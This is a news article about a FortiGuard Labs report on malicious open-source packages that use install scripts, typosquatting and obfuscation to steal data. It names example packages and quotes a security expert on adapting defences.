A new report out today from Fortinet Inc.’s FortiGuard Labs highlights a growing wave of malicious software packages exploiting system vulnerabilities.

Based on data collected since November 2024, the report reveals sophisticated attack methods designed to evade detection, including low-file-count packages, suspicious installation scripts and typosquatting techniques.

FortiGuard Labs’ analysis identified thousands of malicious packages distributed across open-source repositories, using various techniques to compromise systems. The malicious packages identified included lightweight code designed to evade detection, scripts that execute malware upon installation and packages lacking repository URLs, making them harder to trace.

Attackers were also found to be embedding malicious URLs and exploring application programming interfaces to exfiltrate data or enable remote control. Many of the packages were found to use deceptive tactics, such as artificially high version numbers and empty descriptions, to obscure their true intent and mislead users.

The research found that attackers often use low-file-count packages to bypass traditional security measures, deploying lightweight but harmful code. The packages frequently employ obfuscation and command overwrites, allowing attackers to execute malicious actions like data exfiltration and unauthorized system access without detection.

Another common attack vector, suspicious install scripts, was found to be used to stealthily introduce malicious code during the installation process. Some of the scripts modify installation procedures to establish persistence, while others leverage external APIs to communicate with attacker-controlled servers for data collection or further payload downloads.

Malicious packages were also found to frequently exploit APIs and external URLs to facilitate data theft or remote control of infected systems. Threat actors often embed disguised URLs or weaponized API calls, such as https.get and https.request, to exfiltrate sensitive information or establish connections to command-and-control infrastructure.

Multiple threats

Fortinet discovered multiple Python-based threats that exploit setup.py files to silently gather system details, such as MAC addresses and user credentials, before sending them to remote servers. Examples include AffineQuant-99.6 and amzn-aws-glue-ml-libs-python-6.1.5, which leverage these techniques to harvest sensitive data and potentially enable further attacks.

Additionally, malicious JavaScript-based scripts such as seller-admin-common_6.5.8 and xeno.dll_1.0.2 were found harvesting system information and exfiltrating it via Discord webhooks. Some of the variants included keylogging functions, allowing attackers to steal passwords and credit card details while maintaining remote access through backdoors, posing a significant security risk.

Fortinet is urging organizations to implement strong security hygiene, including vetting open-source dependencies, utilizing threat intelligence solutions and applying behavioral analysis techniques to detect emerging malware threats.

Jason Soroko, senior fellow at certificate management company Sectigo Ltd., told SiliconANGLE via email that the report “suggests that attackers now favor lean, obfuscated packages that slip past traditional defense” and that “with low file counts, dubious install scripts and missing metadata, these threats exploit system vulnerabilities by cloaking harmful actions in minimal code and deceptive indicators.”

“When the attackers teach us something, we should listen,” added Soroko. “Conventional tools must adapt to detect subtle evasion techniques like command overwrites and typosquatting, while robust, adaptive defenses become critical in verifying software legitimacy amidst increasingly ambiguous threat landscapes.”

Image: SiliconANGLE/Ideogram